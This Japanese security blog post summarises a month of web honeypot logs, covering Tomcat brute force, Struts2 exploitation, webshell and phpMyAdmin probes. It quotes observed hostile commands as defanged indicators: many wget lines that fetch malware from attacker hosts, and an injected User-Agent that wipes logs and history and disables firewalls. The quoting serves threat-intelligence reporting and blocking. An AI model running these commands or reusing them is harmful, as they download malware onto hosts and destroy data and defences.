S-Owl

S(ecurity)Owl

ハニーポットのログ分析まとめ(2018年09月度)

2018年09月度のWOWHoneypotのログ分析まとめです。

前置き:WOWHoneypotを使って80/tcpアクセスログを観測しています。

 

■日次のアクセス数

f:id:Sec-Owl:20181007014743p:plain

アクセス数が多い日は主にTomcatの管理ページへのブルートフォース攻撃があった日となります。

 

■アクセスパス

この1ヶ月間でのアクセスをメソッド+パスによって分類すると計531種来ていました。

トップ20は以下になります。

f:id:Sec-Owl:20181007232455p:plain

件数 種別 リクエス
17340 GET /manager/html Tomcat管理ページへのブルートフォース攻撃
935 GET / アクセス
202 GET /index.action Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃
135 POST /qq.php phpのWebShell設置の調査
73 GET /cmd.php phpのWebShell設置の調査
72 POST /xx.php phpのWebShell設置の調査
72 POST /q.php phpのWebShell設置の調査
68 GET /shell.php phpのWebShell設置の調査
67 GET /www/phpMyAdmin/index.php phpMyAdminの調査
67 GET /tools/phpMyAdmin/index.php phpMyAdminの調査
65 GET /web/phpMyAdmin/index.php phpMyAdminの調査
65 GET /phpMyAdmin/phpMyAdmin/index.php phpMyAdminの調査
64 POST /s.php phpのWebShell設置の調査
64 GET /phpMyAdmin/index.php phpMyAdminの調査
64 GET /claroline/phpMyAdmin/index.php phpMyAdminの調査
61 GET /admin/phpMyAdmin/index.php phpMyAdminの調査
53 POST /test.php phpのWebShell設置の調査
49 POST /qaq.php phpのWebShell設置の調査
41 GET /phpMyAdmin/scripts/setup.php phpMyAdminの調査
40 POST /db.init.php phpのWebShell設置の調査

 

■ハンティングログ

主に任意のコード実行の脆弱性マルウェア本体を取得しに行くようなログをまとめたものです。遮断してしまって良いものです。

検知したものは主にMirai系、Struts2が多かったです。

件数 リクエス
40 wget -c hxxp://wap.tfddos[.]net:57843/linux
34 wget hxxp://77.87.77[.]250/izuku.sh
25 wget -c hxxp://222.186.138[.]8:3333/bbbiu
16 wget hxxp://80.211.173[.]159/k
10 wget -c hxxp://43.226.152[.]13:6565/Linux-syn25000
8 wget hxxp://185.10.68[.]163/worldwest.sh
7 wget hxxp://80.211.106[.]251/sh
5 wget hxxp://148.72.176[.]78/ngynx
3 wget hxxp://77.73.69[.]246/dl
2 wget</string><string>hxxp://185.10.68[.]163/worldwest.sh
2 wget -P /root/ hxxp://222.73.85[.]188:1996/.yam;wget -P /root/ hxxp://222.73.85[.]188:1996/install.sh;wget -P /root/ hxxp://222.73[.]85.188:1996/config.json
2 wget hxxp://212.237.32[.]62/k
2 wget hxxp://209.141.33[.]86/d
2 wget hxxp://148.72.176[.]78/ken.sh
1 wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
1 wget -P /root/ hxxp://222.73.85[.]188:1996/.centos64;wget -P /root/ hxxp://222.73.85[.]188:1996/.centos32
1 wget -P /root/ hxxp://222.73.85[.]188:1996/.centos32;wget -P /root/ hxxp://222.73.85[.]188:1996/.centos64
1 wget${IFS}hxxp://185.10.68[.]163/worldwest.sh
1 wget hxxp://80.211.148[.]109/bins.sh
1 wget hxxp://185.172.164[.]41/e
1 wget hxxp://159.89.204[.]166/d
1 wget hxxp://128.199.251[.]119/t.php
1 wget hxxp://104.148.70[.]5:8080/net7000
1 wget -c hxxp://aaa.linuxa[.]club:57843/linux
1 wget -c hxxp://43.226.146[.]23:2422/qbz95
1 wget -c hxxp://23.249.162[.]123:9998/servic
1 wget -c hxxp://103.55.13[.]68:13333/nux

 

■アクセス元IP

この1ヶ月間でアクセスのあったIP数は1167IPとなります。

モノによっては件数が多いですが、大抵は一度に大量に来るのみで継続してアクセスのあるIPは稀です。

アクセス元IPを世界地図でマッピングすると以下のようになります。

f:id:Sec-Owl:20181007225149p:plain

トップ50は以下になります。

f:id:Sec-Owl:20181007225113p:plain

 

ドメイン名でのアクセス

途中から取得したドメイン名に対するアクセスは以下です。

特に宣伝等していなければ、大したものは来ないようです。

件数 パス
73 GET /
29 GET /robots.txt
3 HEAD /
1 GET /sitemap.xml
1 GET /favicon.ico
1 GET /ads.txt

 

 

以下、個別のアクセスに対する分析です。

Tomcatの管理ページに対するブルートフォース攻撃

この1ヶ月で一番多かったものですが、やはり過去から見ても傾向として非常に多いことがわかります。

f:id:Sec-Owl:20181007232137p:plain

 

■.phpファイルへのアクセス

いろんなパスに対してきますが、アクセス数が横並びになるパスも多く、ツールで回されている感じがします。

f:id:Sec-Owl:20181007232704p:plain

 

 

■Mirai系アクセス

主にD-Linkの脆弱性を突く攻撃とGPONルータの脆弱性を突く攻撃が来ていました。

それぞれ以下のようなUser-Agentできていました。

・D-Link

件数 User-Agent
49 Hakai/2.0
18 LMAO/2.0
3 Shinka/2.0
3 Gemini/2.0
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
1 Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;

・GPON

件数 User-Agent
24 Hello, World
3 CarlosMatos/69.0

 

■余談

当ブログですが、10月頭で10,000アクセスを超えました、ありがとうございます。

 アクセス元の8割弱はGoogleの検索からで、何かのログを調査しようとした際に当ブログが引っかっているのかと思います。調査した内容が役に立っている可能性が高そうと思っており、当初の目的通りで良かったです。

残りの2割り程度はtwitterからで、日次で記載してツイートしたものから見に来てもらっているものと思われます。

ありがとうございます!

 

以上です。